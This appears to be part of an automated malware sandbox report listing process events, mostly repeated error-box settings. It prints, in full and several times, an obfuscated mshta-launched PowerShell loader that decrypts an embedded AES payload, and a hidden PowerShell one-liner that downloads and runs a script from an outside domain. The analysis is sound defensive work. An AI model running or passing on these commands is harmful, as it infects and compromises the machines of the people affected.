Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\dll\System.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7C00AD pushad ; iretd 0_2_00007FFD9B7C00C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_050B8EAA push esp; ret 6_2_050B8EB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
